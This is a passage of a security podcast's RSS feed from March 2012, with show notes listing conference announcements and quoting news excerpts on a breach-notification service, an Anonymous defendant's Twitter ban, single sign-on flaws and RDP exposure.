<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Monday, Pwned List announced that it aims to transform that post-breach notification service into a business. While anyone can still visit the site for free and check their email address or username, users can also pay a dollar a month for a service that emails them an automatic alert if their account data has been dumped by hackers on the Web. And perhaps more significantly for the site&rsquo;s revenue, it will offer the same automated breach notification service to corporate customers, scouring the Web for any email linked with a company&rsquo;s collection of domains for a five-figure annual fee.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We may not catch absolutely everything, but we can catch the vast majority of credentials stolen and shared by hackers. We&rsquo;ll notify a company the same day that we identify a new credential from its domain,&rdquo; says Steve Thomas, the company&rsquo;s chief executive. &ldquo;Our goal is to be our customers&rsquo; eyes and ears, and take a chunk out of their risk of data theft.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Aside from hackers&rsquo; favorite depositories for publishing stolen information like Pastebin and the Pirate Bay, Thomas says Pwned List has amassed more than 200 sources of hacked information that it constantly scours for updates. And it&rsquo;s also created an upload portal so that volunteers (or the hackers who have themselves stolen user data) can upload stolen information or point the company toward public posts of hacked material. &ldquo;Maybe you stumbled upon some hacker booty or have a little trophy of your own?,&rdquo; the site reads. &ldquo;There are many secure ways to share your data with us, without exposing your identity.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.thesmokinggun.com/documents/judge-lifts-anonymous-twitter-ban-145792"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thesmokinggun.com/documents/judge-lifts-anonymous-twitter-ban-145792</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Over objections from the Department of Justice, a judge has lifted a Twitter ban on 14 accused members of &ldquo;Anonymous&rdquo; now under indictment for their alleged roles in a coordinated online assault against PayPal, an attack prosecutors contend was carried out via the social networking site.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ruling on motions filed by several defendants,</span><a href="http://www.thesmokinggun.com/file/anonymous-twitter?page=0"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Magistrate Judge Paul Grewal stated</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that since government lawyers did not sufficiently link &ldquo;allegedly criminal activities to use of a Twitter account,&rdquo; the defendants were free to use the microblogging service. Grewal&rsquo;s order was filed Friday in U.S. District Court in San Jose, California.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a</span><a href="http://www.thesmokinggun.com/documents/anonymous-member-wants-to-tweet-986512"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">January court filing</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, defendant Vincent Kershaw argued that bail conditions barring his use of Twitter unduly burdened his First Amendment right to engage in political discourse. Kershaw, 28, contended that the Twitter ban prohibited him from &ldquo;even perusing such critical communications from our own President or engaging in the Twitter Town Halls in any manner.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In opposing Kershaw&rsquo;s motion, a prosecutor described Twitter as one of the &ldquo;principle tools through which the members of the Anonymous hacking group planned and coordinated their criminal activities.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kershaw, pictured in the above mug shot, also sought permission to use Internet Relay Chat so that he could participate in &ldquo;political debate&rdquo; and &ldquo;political speech&rdquo; in IRC chat rooms. That motion was denied by Grewal, who ruled that Kershaw and his codefendants are allowed &ldquo;substantial internet use for purposes that include political discourse.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kershaw, a Colorado landscaper, and his codefendants were charged last July with conspiracy and intentional damage to a protected computer for allegedly participating in an &ldquo;Anonymous&rdquo;-organized denial of service attack on PayPal. The felony counts carry a combined maximum of 15 years in prison and a $500,000 fine.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-624-sso-fails-card-cloning-case-ur0b0r0x-20-pwnage-monitoring-and-ban-lifted/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3662/0/infosec-daily-podcast-episode-624.mp3" length="15062708" type="audio/mpeg" />
		<itunes:duration>0:31:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 624 for March 20, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik ,and Dr. Bonez.
&#160;
Announcements:
How to Rob a bank in 30 days 
When: March 20th, 2012
Where: http://securityzone.co/webina[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 624 for March 20, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik ,and Dr. Bonez.
&#160;
Announcements:
How to Rob a bank in 30 days 
When: March 20th, 2012
Where: http://securityzone.co/webinar-en.html
&#160;
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.ea25e3ef-5027-40e4-a56f-ad6cfcd06cb3[/amazon-carrousel]
 
Stories
Source: &#160;http://www.darkreading.com/authentication/167901072/security/news/232602844/web-services-single-sign-on-contain-big-flaws.html
As more and more organizations tap into single sign-on (SSO) schemes through Web services providers such as Google and Facebook, new research suggests that they must better plan how they implement SSO APIs lest they leave users open to attack. New findings by Microsoft Research found troubling logic flaws in SSO for Facebook, Google ID, PayPal, and other Web services that threaten a large number of users online.
Though each flaw had its own unique characteristics, all eight detailed in the report had one trait in common.
&#34;All these flaws allow the attacker to sign in as the victim to her accounts on the websites using SSO services even without knowing the victim&#8217;s password,&#34; says Dr. XiaoFeng Wang, associate professor of computer science at Indiana University at Bloomington and co-author of the report with Rui Wang and Shuo Chen. &#160;
&#8230;
Source: http://www.cultofmac.com/154808/geode-turns-iphone-into-universal-credit-card-rewriter/
I never thought I&#8217;d get excited about boring credit cards, but Geode is an incredibly neat little kit which turns your iPhone into a payment system that can be used anywhere. And not some fancy NFC-style POS terminals, either. The Geode works anywhere you can use a regular credit card.
The kit contains three main parts, plus an app. First is the case, into which your iPhone slips. The second is a detachable card reader, and the third is a reprogrammable credit card which lives in the back of the iPhone case.
To use it, you scan your cards into your phone by swiping them through the reader, and then toss the reader into a drawer or whatever. Then, when you want to use a card, select it in the app and its details are wr[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 623 &#8211; 5Mil RDP, WCE Updated, Duqu Solved, Stolen Encryption, Dictation Spy, 30yr old Software</title>
		<link>http://www.isdpodcast.com/episode-623-5mil-rdp-wce-updated-duqu-solved-stolen-encryption-dictation-spy-30yr-old-software</link>
		<comments>http://www.isdpodcast.com/episode-623-5mil-rdp-wce-updated-duqu-solved-stolen-encryption-dictation-spy-30yr-old-software#comments</comments>
		<pubDate>Tue, 20 Mar 2012 00:48:59 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3657</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 623 for March 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, Karthik Rangarajan, and Dr. Bonez. &#160; Announcements: InfoSec Southwest When: March 30-April 1 Where: Austin, TX http://www.Infosecsouthwest.com &#160; Linuxfest Northwest 2012 When: Saturday, April 28th-29th, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 623 for March 19, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Beau Woods, Karthik Rangarajan, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1<br class="kix-line-break" /><br />
	Where: Austin, TX<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012<br class="kix-line-break" /><br />
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV<br class="kix-line-break" /><br />
	</span><a href="http://defcon.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2F&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2F&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div>ea25e3ef-5027-40e4-a56f-ad6cfcd06cb3[/amazon-carrousel</span><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">]</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Up-to-5-Million-Computers-May-Be-Exposed-to-RDP-Attack-259578.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since it became obvious that a fully functional Remote Desktop Protocol (RDP) exploit code is</span><a href="http://news.softpedia.com/news/Windows-RDP-Vulnerability-Exploit-Code-Confirmed-259060.shtml"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">available</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a researcher scanned part of the Internet to determine how many computers communicate using RDP.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researcher Dan Kaminsky scanned around 300 million IPs, of which around 414,000 turned out to be potentially exposed to a large-scale attack. Since 300 million IPs represents approximately 8% of the entire Web, the simple conclusion is that up to 5 million devices may be exposed worldwide.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, if they communicate using RDP, that doesn&rsquo;t necessarily mean they are susceptible because a certain percentage may be patched up and some of them may not even run Microsoft operating systems, but still, the potential number of victims is enormous.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There&rsquo;s something larger going on, and it&rsquo;s the relevance of a bug on what can be possibly called the Critical Server Attack Surface,&rdquo; Kaminsky wrote on his</span><a href="http://dankaminsky.com/2012/03/18/rdp/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Not all bugs are equally dangerous because not all code is equally deployed. Some flaws are simply more accessible than others, and RDP &mdash; as the primary mechanism by which Windows systems are remotely administered &mdash; is a lot more accessible than a lot of people were aware of.&rdquo;</span></p>
